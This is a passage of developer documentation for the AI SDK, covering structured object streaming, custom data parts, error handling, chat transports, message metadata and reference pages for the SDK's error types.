schema: notificationSchema,
prompt:
`Generate 3 notifications for a messages app in this context:` + context,
});
return result.toTextStreamResponse();
}
Enum Output Mode
When you need to classify or categorize input into predefined options, you can use the enum output mode with useObject. This requires a specific schema structure where the object has enum as a key with z.enum containing your possible values.
Example: Text Classification
This example shows how to build a simple text classifier that categorizes statements as true or false.
Client
When using useObject with enum output mode, your schema must be an object with enum as the key:
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { z } from 'zod';
export default function ClassifyPage() {
const { object, submit, isLoading } = useObject({
api: '/api/classify',
schema: z.object({ enum: z.enum(['true', 'false']) }),
});
return (
<>
<button onClick={() => submit('The earth is flat')} disabled={isLoading}>
Classify statement
</button>
{object && <div>Classification: {object.enum}</div>}
</>
);
}
Server
On the server, use streamObject with output: 'enum' to stream the classification result:
import { streamObject } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const context = await req.json();
const result = streamObject({
model: __MODEL__,
output: 'enum',
enum: ['true', 'false'],
prompt: `Classify this statement as true or false: ${context}`,
});
return result.toTextStreamResponse();
}
Customized UI
useObject also provides ways to show loading and error states:
Loading State
The isLoading state returned by the useObject hook can be used for several
purposes:
- To show a loading spinner while the object is generated.
- To disable the submit button.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { isLoading, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && <Spinner />}
<button
onClick={() => submit('Messages during finals week.')}
disabled={isLoading}
>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Stop Handler
The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { isLoading, stop, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && (
<button type="button" onClick={() => stop()}>
Stop
</button>
)}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, or to disable the submit button:
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { error, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{error && <div>An error occurred.</div>}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Event Callbacks
useObject provides optional event callbacks that you can use to handle life-cycle events.
- onFinish: Called when the object generation is completed.
- onError: Called when an error occurs during the fetch request.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
onFinish({ object, error }) {
// typed object, undefined if schema validation fails:
console.log('Object generation completed:', object);
// error, undefined if schema validation succeeds:
console.log('Schema validation error:', error);
},
onError(error) {
// error during fetch request:
console.error('An error occurred:', error);
},
});
return (
<div>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</div>
);
}
Configure Request Options
You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.
const { submit, object } = useObject({
api: '/api/use-object',
headers: {
'X-Custom-Header': 'CustomValue',
},
credentials: 'include',
schema: yourSchema,
});
title: Streaming Custom Data description: Learn how to stream custom data from the server to the client.
Streaming Custom Data
It is often useful to send additional data alongside the model's response. For example, you may want to send status information, the message ids after storing them, or references to content that the language model is referring to.
The AI SDK provides several helpers that allow you to stream additional data to the client
and attach it to the UIMessage parts array:
- createUIMessageStream: creates a data stream
- createUIMessageStreamResponse: creates a response object that streams data
- pipeUIMessageStreamToResponse: pipes a data stream to a server response object
The data is streamed as part of the response stream using Server-Sent Events.
Setting Up Type-Safe Data Streaming
First, define your custom message type with data part schemas for type safety:
import { UIMessage } from 'ai';
// Define your custom message type with data part schemas
export type MyUIMessage = UIMessage<
never, // metadata type
{
weather: {
city: string;
weather?: string;
status: 'loading' | 'success';
};
notification: {
message: string;
level: 'info' | 'warning' | 'error';
};
} // data parts type
>;
Streaming Data from the Server
In your server-side route handler, you can create a UIMessageStream and then pass it to createUIMessageStreamResponse:
import {
createUIMessageStream,
createUIMessageStreamResponse,
streamText,
convertToModelMessages,
} from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/ai/types';
export async function POST(req: Request) {
const { messages } = await req.json();
const stream = createUIMessageStream<MyUIMessage>({
execute: ({ writer }) => {
// 1. Send initial status (transient - won't be added to message history)
writer.write({
type: 'data-notification',
data: { message: 'Processing your request...', level: 'info' },
transient: true, // This part won't be added to message history
});
// 2. Send sources (useful for RAG use cases)
writer.write({
type: 'source',
value: {
type: 'source',
sourceType: 'url',
id: 'source-1',
url: 'https://weather.com',
title: 'Weather Data Source',
},
});
// 3. Send data parts with loading state
writer.write({
type: 'data-weather',
id: 'weather-1',
data: { city: 'San Francisco', status: 'loading' },
});
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
onFinish() {
// 4. Update the same data part (reconciliation)
writer.write({
type: 'data-weather',
id: 'weather-1', // Same ID = update existing part
data: {
city: 'San Francisco',
weather: 'sunny',
status: 'success',
},
});
// 5. Send completion notification (transient)
writer.write({
type: 'data-notification',
data: { message: 'Request completed', level: 'info' },
transient: true, // Won't be added to message history
});
},
});
writer.merge(result.toUIMessageStream());
},
});
return createUIMessageStreamResponse({ stream });
}
Types of Streamable Data
Data Parts (Persistent)
Regular data parts are added to the message history and appear in message.parts:
writer.write({
type: 'data-weather',
id: 'weather-1', // Optional: enables reconciliation
data: { city: 'San Francisco', status: 'loading' },
});
Sources
Sources are useful for RAG implementations where you want to show which documents or URLs were referenced:
writer.write({
type: 'source',
value: {
type: 'source',
sourceType: 'url',
id: 'source-1',
url: 'https://example.com',
title: 'Example Source',
},
});
Transient Data Parts (Ephemeral)
Transient parts are sent to the client but not added to the message history. They are only accessible via the onData useChat handler:
// server
writer.write({
type: 'data-notification',
data: { message: 'Processing...', level: 'info' },
transient: true, // Won't be added to message history
});
// client
const [notification, setNotification] = useState();
const { messages } = useChat({
onData: ({ data, type }) => {
if (type === 'data-notification') {
setNotification({ message: data.message, level: data.level });
}
},
});
Data Part Reconciliation
When you write to a data part with the same ID, the client automatically reconciles and updates that part. This enables powerful dynamic experiences like:
- Collaborative artifacts - Update code, documents, or designs in real-time
- Progressive data loading - Show loading states that transform into final results
- Live status updates - Update progress bars, counters, or status indicators
- Interactive components - Build UI elements that evolve based on user interaction
The reconciliation happens automatically - simply use the same id when writing to the stream.
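For instance, a hypothetical progress indicator (data-progress is an assumed data part type, not one defined in MyUIMessage above) could stream repeated writes under one ID, and the client would render a single part updating in place:
// Each write targets the same ID, so the client reconciles the part
// instead of appending a new one.
for (let percent = 0; percent <= 100; percent += 25) {
  writer.write({
    type: 'data-progress', // assumed data part type for this sketch
    id: 'progress-1', // same ID = update existing part
    data: { percent },
  });
}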
Processing Data on the Client
Using the onData Callback
The onData callback is essential for handling streaming data, especially transient parts:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/ai/types';
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({ api: '/api/chat' }),
onData: dataPart => {
// Handle all data parts as they arrive (including transient parts)
console.log('Received data part:', dataPart);
// Handle different data part types
if (dataPart.type === 'data-weather') {
console.log('Weather update:', dataPart.data);
}
// Handle transient notifications (ONLY available here, not in message.parts)
if (dataPart.type === 'data-notification') {
showToast(dataPart.data.message, dataPart.data.level);
}
},
});
Important: Transient data parts are only available through the onData callback. They will not appear in the message.parts array since they're not added to message history.
Rendering Persistent Data Parts
You can filter and render data parts from the message parts array:
const result = (
<>
{messages?.map(message => (
<div key={message.id}>
{/* Render weather data parts */}
{message.parts
.filter(part => part.type === 'data-weather')
.map((part, index) => (
<div key={index} className="weather-widget">
{part.data.status === 'loading' ? (
<>Getting weather for {part.data.city}...</>
) : (
<>
Weather in {part.data.city}: {part.data.weather}
</>
)}
</div>
))}
{/* Render text content */}
{message.parts
.filter(part => part.type === 'text')
.map((part, index) => (
<div key={index}>{part.text}</div>
))}
{/* Render sources */}
{message.parts
.filter(part => part.type === 'source')
.map((part, index) => (
<div key={index} className="source">
Source: <a href={part.url}>{part.title}</a>
</div>
))}
</div>
))}
</>
);
Complete Example
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
import type { MyUIMessage } from '@/ai/types';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({ api: '/api/chat' }),
onData: dataPart => {
// Handle transient notifications
if (dataPart.type === 'data-notification') {
console.log('Notification:', dataPart.data.message);
}
},
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<>
{messages?.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{/* Render weather data */}
{message.parts
.filter(part => part.type === 'data-weather')
.map((part, index) => (
<span key={index} className="weather-update">
{part.data.status === 'loading' ? (
<>Getting weather for {part.data.city}...</>
) : (
<>
Weather in {part.data.city}: {part.data.weather}
</>
)}
</span>
))}
{/* Render text content */}
{message.parts
.filter(part => part.type === 'text')
.map((part, index) => (
<div key={index}>{part.text}</div>
))}
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Ask about the weather..."
/>
<button type="submit">Send</button>
</form>
</>
);
}
Use Cases
- RAG Applications - Stream sources and retrieved documents
- Real-time Status - Show loading states and progress updates
- Collaborative Tools - Stream live updates to shared artifacts
- Analytics - Send usage data without cluttering message history
- Notifications - Display temporary alerts and status messages
Message Metadata vs Data Parts
Both message metadata and data parts allow you to send additional information alongside messages, but they serve different purposes:
Message Metadata
Message metadata is best for message-level information that describes the message as a whole:
- Attached at the message level via message.metadata
- Sent using the messageMetadata callback in toUIMessageStreamResponse
- Ideal for: timestamps, model info, token usage, user context
- Type-safe with custom metadata types
// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
messageMetadata: ({ part }) => {
if (part.type === 'finish') {
return {
model: part.response.modelId,
totalTokens: part.totalUsage.totalTokens,
createdAt: Date.now(),
};
}
},
});
Data Parts
Data parts are best for streaming dynamic arbitrary data:
- Added to the message parts array via message.parts
- Streamed using createUIMessageStream and writer.write()
- Can be reconciled/updated using the same ID
- Support transient parts that don't persist
- Ideal for: dynamic content, loading states, interactive components
// Server: Stream data as part of message content
writer.write({
type: 'data-weather',
id: 'weather-1',
data: { city: 'San Francisco', status: 'loading' },
});
For more details on message metadata, see the Message Metadata documentation.
title: Error Handling description: Learn how to handle errors in the AI SDK UI
Error Handling and Warnings
Warnings
The AI SDK shows warnings when something might not work as expected. These warnings help you fix problems before they cause errors.
When Warnings Appear
Warnings are shown in the browser console when:
- Unsupported settings: You use a setting that the AI model doesn't support
- Unsupported tools: You use a tool that the AI model can't use
- Other issues: The AI model reports other problems
Warning Messages
All warnings start with "AI SDK Warning:" so you can easily find them. For example:
AI SDK Warning: The "temperature" setting is not supported by this model
AI SDK Warning: The tool "calculator" is not supported by this model
Turning Off Warnings
By default, warnings are shown in the console. You can control this behavior:
Turn Off All Warnings
Set a global variable to turn off warnings completely:
globalThis.AI_SDK_LOG_WARNINGS = false;
Custom Warning Handler
You can also provide your own function to handle warnings:
globalThis.AI_SDK_LOG_WARNINGS = warnings => {
// Handle warnings your own way
warnings.forEach(warning => {
// Your custom logic here
console.log('Custom warning:', warning);
});
};
Error Handling
Error Helper Object
Each AI SDK UI hook also returns an error object that you can use to render the error in your UI. You can use the error object to show an error message, disable the submit button, or show a retry button.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage, error, regenerate } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts
.filter(part => part.type === 'text')
.map(part => part.text)
.join('')}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => regenerate()}>
Retry
</button>
</>
)}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={error != null}
/>
</form>
</div>
);
}
Alternative: replace last message
Alternatively you can write a custom submit handler that replaces the last message when an error is present.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { sendMessage, error, messages, setMessages } = useChat();
function customSubmit(event: React.FormEvent<HTMLFormElement>) {
event.preventDefault();
if (error != null) {
setMessages(messages.slice(0, -1)); // remove last message
}
sendMessage({ text: input });
setInput('');
}
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts
.filter(part => part.type === 'text')
.map(part => part.text)
.join('')}
</div>
))}
{error && <div>An error occurred.</div>}
<form onSubmit={customSubmit}>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</div>
);
}
Error Handling Callback
Errors can be processed by passing an onError callback function as an option to the useChat or useCompletion hooks.
The callback function receives an error object as an argument.
import { useChat } from '@ai-sdk/react';
export default function Page() {
const {
/* ... */
} = useChat({
// handle error:
onError: error => {
console.error(error);
},
});
}
Injecting Errors for Testing
You might want to create errors for testing. You can easily do so by throwing an error in your route handler:
export async function POST(req: Request) {
throw new Error('This is a test error');
}
title: Transport description: Learn how to use custom transports with useChat.
Transport
The useChat transport system provides fine-grained control over how messages are sent to your API endpoints and how responses are processed. This is particularly useful for alternative communication protocols like WebSockets, custom authentication patterns, or specialized backend integrations.
Default Transport
By default, useChat uses HTTP POST requests to send messages to /api/chat:
import { useChat } from '@ai-sdk/react';
// Uses default HTTP transport
const { messages, sendMessage } = useChat();
This is equivalent to:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
Custom Transport Configuration
Configure the default transport with custom options:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: {
Authorization: 'Bearer your-token',
'X-API-Version': '2024-01',
},
credentials: 'include',
}),
});
Dynamic Configuration
You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
headers: () => ({
Authorization: `Bearer ${getAuthToken()}`,
'X-User-ID': getCurrentUserId(),
}),
body: () => ({
sessionId: getCurrentSessionId(),
preferences: getUserPreferences(),
}),
credentials: () => 'include',
}),
});
Request Transformation
Transform requests before sending to your API:
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
return {
headers: {
'X-Session-ID': id,
},
body: {
messages: messages.slice(-10), // Only send last 10 messages
trigger,
messageId,
},
};
},
}),
});
Building Custom Transports
To understand how to build your own transport, refer to the source code of the default implementation:
- DefaultChatTransport - The complete default HTTP transport implementation
- HttpChatTransport - Base HTTP transport with request handling
- ChatTransport Interface - The transport interface you need to implement
These implementations show you exactly how to:
- Handle the sendMessages method
- Process UI message streams
- Transform requests and responses
- Handle errors and connection management
The transport system gives you complete control over how your chat application communicates, enabling integration with any backend protocol or service.
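As a rough illustration (not the canonical implementation), a custom transport can also delegate to DefaultChatTransport and layer behavior on top. This sketch assumes the ChatTransport interface with its sendMessages and reconnectToStream methods:
import {
  DefaultChatTransport,
  type ChatTransport,
  type UIMessage,
  type UIMessageChunk,
} from 'ai';
// A minimal sketch: wrap the default HTTP transport and log every send.
class LoggingChatTransport<M extends UIMessage> implements ChatTransport<M> {
  private inner = new DefaultChatTransport<M>({ api: '/api/chat' });
  sendMessages(
    options: Parameters<ChatTransport<M>['sendMessages']>[0],
  ): Promise<ReadableStream<UIMessageChunk>> {
    console.log('Sending', options.messages.length, 'messages'); // custom behavior
    return this.inner.sendMessages(options);
  }
  reconnectToStream(
    options: Parameters<ChatTransport<M>['reconnectToStream']>[0],
  ): Promise<ReadableStream<UIMessageChunk> | null> {
    return this.inner.reconnectToStream(options);
  }
}
You would then pass an instance to the hook, e.g. useChat({ transport: new LoggingChatTransport() }).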
title: Reading UIMessage Streams description: Learn how to read UIMessage streams.
Reading UI Message Streams
UIMessage streams are useful outside of traditional chat use cases. You can consume them for terminal UIs, custom stream processing on the client, or React Server Components (RSC).
The readUIMessageStream helper transforms a stream of UIMessageChunk objects into an AsyncIterableStream of UIMessage objects, allowing you to process messages as they're being constructed.
Basic Usage
import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;
async function main() {
const result = streamText({
model: __MODEL__,
prompt: 'Write a short story about a robot.',
});
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
console.log('Current message state:', uiMessage);
}
}
Tool Calls Integration
Handle streaming responses that include tool calls:
import { readUIMessageStream, streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function handleToolCalls() {
const result = streamText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in Tokyo?',
});
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
// Handle different part types
uiMessage.parts.forEach(part => {
switch (part.type) {
case 'text':
console.log('Text:', part.text);
break;
case 'tool-weather':
if (part.state === 'input-available') {
console.log('Tool called with input:', part.input);
}
if (part.state === 'output-available') {
console.log('Tool result:', part.output);
}
break;
}
});
}
}
Resuming Conversations
Resume streaming from a previous message state:
import { readUIMessageStream, streamText, type UIMessage } from 'ai';
__PROVIDER_IMPORT__;
async function resumeConversation(lastMessage: UIMessage) {
const result = streamText({
model: __MODEL__,
messages: [
{ role: 'user', content: 'Continue our previous conversation.' },
],
});
// Resume from the last message
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
message: lastMessage, // Resume from this message
})) {
console.log('Resumed message:', uiMessage);
}
}
title: Message Metadata description: Learn how to attach and use metadata with messages in AI SDK UI
Message Metadata
Message metadata allows you to attach custom information to messages at the message level. This is useful for tracking timestamps, model information, token usage, user context, and other message-level data.
Overview
Message metadata differs from data parts in that it's attached at the message level rather than being part of the message content. While data parts are ideal for dynamic content that forms part of the message, metadata is perfect for information about the message itself.
Getting Started
Here's a simple example of using message metadata to track timestamps and model information:
Defining Metadata Types
First, define your metadata type for type safety:
import { UIMessage } from 'ai';
import { z } from 'zod';
// Define your metadata schema
export const messageMetadataSchema = z.object({
createdAt: z.number().optional(),
model: z.string().optional(),
totalTokens: z.number().optional(),
});
export type MessageMetadata = z.infer<typeof messageMetadataSchema>;
// Create a typed UIMessage
export type MyUIMessage = UIMessage<MessageMetadata>;
Sending Metadata from the Server
Use the messageMetadata callback in toUIMessageStreamResponse to send metadata at different streaming stages:
import { convertToModelMessages, streamText } from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/types';
export async function POST(req: Request) {
const { messages }: { messages: MyUIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages, // pass this in for type-safe return objects
messageMetadata: ({ part }) => {
// Send metadata when streaming starts
if (part.type === 'start') {
return {
createdAt: Date.now(),
model: 'your-model-id',
};
}
// Send additional metadata when streaming completes
if (part.type === 'finish') {
return {
totalTokens: part.totalUsage.totalTokens,
};
}
},
});
}
Accessing Metadata on the Client
Access metadata through the message.metadata property:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/types';
export default function Chat() {
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.metadata?.createdAt && (
<span className="text-sm text-gray-500">
{new Date(message.metadata.createdAt).toLocaleTimeString()}
</span>
)}
</div>
{/* Render message content */}
{message.parts.map((part, index) =>
part.type === 'text' ? <div key={index}>{part.text}</div> : null,
)}
{/* Display additional metadata */}
{message.metadata?.totalTokens && (
<div className="text-xs text-gray-400">
{message.metadata.totalTokens} tokens
</div>
)}
</div>
))}
</div>
);
}
Common Use Cases
Message metadata is ideal for:
- Timestamps: When messages were created or completed
- Model Information: Which AI model was used
- Token Usage: Track costs and usage limits
- User Context: User IDs, session information
- Performance Metrics: Generation time, time to first token
- Quality Indicators: Finish reason, confidence scores
See Also
- Chatbot Guide - Message metadata in the context of building chatbots
- Streaming Data - Comparison with data parts
- UIMessage Reference - Complete UIMessage type reference
title: AI_APICallError description: Learn how to fix AI_APICallError
AI_APICallError
This error occurs when an API call fails.
Properties
- url: The URL of the API request that failed
- requestBodyValues: The request body values sent to the API
- statusCode: The HTTP status code returned by the API
- responseHeaders: The response headers returned by the API
- responseBody: The response body returned by the API
- isRetryable: Whether the request can be retried based on the status code
- data: Any additional data associated with the error
Checking for this Error
You can check if an error is an instance of AI_APICallError using:
import { APICallError } from 'ai';
if (APICallError.isInstance(error)) {
// Handle the error
}
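For example, a minimal sketch (model and prompt are placeholders) that inspects a failed call before deciding whether to retry:
import { generateText, APICallError } from 'ai';
try {
  await generateText({ model: __MODEL__, prompt: 'Hello' });
} catch (error) {
  if (APICallError.isInstance(error)) {
    // statusCode and isRetryable are properties listed above
    console.log('Status:', error.statusCode);
    console.log('Retryable:', error.isRetryable);
  }
}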
title: AI_DownloadError description: Learn how to fix AI_DownloadError
AI_DownloadError
This error occurs when a download fails.
Properties
- url: The URL that failed to download
- statusCode: The HTTP status code returned by the server
- statusText: The HTTP status text returned by the server
- message: The error message containing details about the download failure
Checking for this Error
You can check if an error is an instance of AI_DownloadError using:
import { DownloadError } from 'ai';
if (DownloadError.isInstance(error)) {
// Handle the error
}
title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError
AI_EmptyResponseBodyError
This error occurs when the server returns an empty response body.
Properties
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_EmptyResponseBodyError using:
import { EmptyResponseBodyError } from 'ai';
if (EmptyResponseBodyError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError
AI_InvalidArgumentError
This error occurs when an invalid argument was provided.
Properties
- parameter: The name of the parameter that is invalid
- value: The invalid value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidArgumentError using:
import { InvalidArgumentError } from 'ai';
if (InvalidArgumentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError
AI_InvalidDataContentError
This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages.
Properties
- content: The invalid content value
- message: The error message describing the expected and received content types
Checking for this Error
You can check if an error is an instance of AI_InvalidDataContentError using:
import { InvalidDataContentError } from 'ai';
if (InvalidDataContentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidDataContent description: Learn how to fix AI_InvalidDataContent
AI_InvalidDataContent
This error occurs when invalid data content is provided.
Properties
- content: The invalid content value
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidDataContent using:
import { InvalidDataContent } from 'ai';
if (InvalidDataContent.isInstance(error)) {
// Handle the error
}
title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError
AI_InvalidMessageRoleError
This error occurs when an invalid message role is provided.
Properties
- role: The invalid role value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidMessageRoleError using:
import { InvalidMessageRoleError } from 'ai';
if (InvalidMessageRoleError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError
AI_InvalidPromptError
This error occurs when the prompt provided is invalid.
Properties
- prompt: The invalid prompt value
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidPromptError using:
import { InvalidPromptError } from 'ai';
if (InvalidPromptError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError
AI_InvalidResponseDataError
This error occurs when the server returns a response with invalid data content.
Properties
- data: The invalid response data value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidResponseDataError using:
import { InvalidResponseDataError } from 'ai';
if (InvalidResponseDataError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidToolInputError description: Learn how to fix AI_InvalidToolInputError
AI_InvalidToolInputError
This error occurs when invalid tool input was provided.
Properties
- toolName: The name of the tool with invalid inputs
- toolInput: The invalid tool inputs
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidToolInputError using:
import { InvalidToolInputError } from 'ai';
if (InvalidToolInputError.isInstance(error)) {
// Handle the error
}
title: AI_JSONParseError description: Learn how to fix AI_JSONParseError
AI_JSONParseError
This error occurs when JSON fails to parse.
Properties
- text: The text value that could not be parsed
- message: The error message including parse error details
Checking for this Error
You can check if an error is an instance of AI_JSONParseError using:
import { JSONParseError } from 'ai';
if (JSONParseError.isInstance(error)) {
// Handle the error
}
title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError
AI_LoadAPIKeyError
This error occurs when an API key is not loaded successfully.
Properties
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadAPIKeyError using:
import { LoadAPIKeyError } from 'ai';
if (LoadAPIKeyError.isInstance(error)) {
// Handle the error
}
title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError
AI_LoadSettingError
This error occurs when a setting is not loaded successfully.
Properties
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadSettingError using:
import { LoadSettingError } from 'ai';
if (LoadSettingError.isInstance(error)) {
// Handle the error
}
title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError
AI_MessageConversionError
This error occurs when message conversion fails.
Properties
- originalMessage: The original message that failed conversion
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_MessageConversionError using:
import { MessageConversionError } from 'ai';
if (MessageConversionError.isInstance(error)) {
// Handle the error
}
title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError
AI_NoContentGeneratedError
This error occurs when the AI provider fails to generate content.
Properties
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoContentGeneratedError using:
import { NoContentGeneratedError } from 'ai';
if (NoContentGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError
AI_NoImageGeneratedError
This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated an invalid response.
Properties
- message: The error message.
- responses: Metadata about the image model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
Checking for this Error
You can check if an error is an instance of AI_NoImageGeneratedError using:
import { generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError
AI_NoObjectGeneratedError
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
Properties
- message: The error message.
- text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
- response: Metadata about the language model response, including response id, timestamp, and model.
- usage: Request token usage.
- finishReason: Request finish reason. For example 'length' if the model generated the maximum number of tokens, which could result in a JSON parsing error.
- cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.
Checking for this Error
You can check if an error is an instance of AI_NoObjectGeneratedError using:
import { generateObject, NoObjectGeneratedError } from 'ai';
try {
await generateObject({ model, schema, prompt });
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
console.log('Finish Reason:', error.finishReason);
}
}
title: AI_NoOutputSpecifiedError description: Learn how to fix AI_NoOutputSpecifiedError
AI_NoOutputSpecifiedError
This error occurs when no output format was specified for the AI response, and output-related methods are called.
Properties
- message: The error message (defaults to 'No output specified.')
Checking for this Error
You can check if an error is an instance of AI_NoOutputSpecifiedError using:
import { NoOutputSpecifiedError } from 'ai';
if (NoOutputSpecifiedError.isInstance(error)) {
// Handle the error
}
title: AI_NoSpeechGeneratedError description: Learn how to fix AI_NoSpeechGeneratedError
AI_NoSpeechGeneratedError
This error occurs when no audio could be generated from the input.
Properties
- responses: Array of responses
